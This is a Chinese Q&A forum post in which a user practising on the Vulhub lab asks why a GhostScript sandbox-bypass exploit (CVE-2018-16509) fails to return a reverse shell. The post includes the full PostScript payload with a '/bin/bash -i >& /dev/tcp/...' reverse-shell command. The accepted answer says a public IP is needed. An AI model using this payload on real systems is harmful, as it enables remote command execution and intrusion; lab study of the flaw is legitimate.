acvxd123 2022-09-12 11:03 采纳率: 64.1%
浏览 20
已结题

下面的代码改成反弹shell执行失败,怎么改?

我想要达到的结果

vulhub里面漏洞——GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
反弹不了,应该怎么改啊

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%exec("/bin/bash -i >& /dev/tcp/192.168.52.0/8888") > /tmp/nxx && cat /tmp/nxx) currentdevice putdeviceprops

  • 写回答

2条回答 默认 最新

  • ????27282 优质创作者: 信息安全技术领域 2022-09-17 09:07
    关注

    vulhub里面漏洞?
    你需要你个公网ip去做反弹,不然靶机找不到192.168.52.0 (内网)

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(1条)

报告相同问题?

问题事件

  • 系统已结题 9月27日
  • 已采纳回答 9月19日
  • 创建了问题 9月12日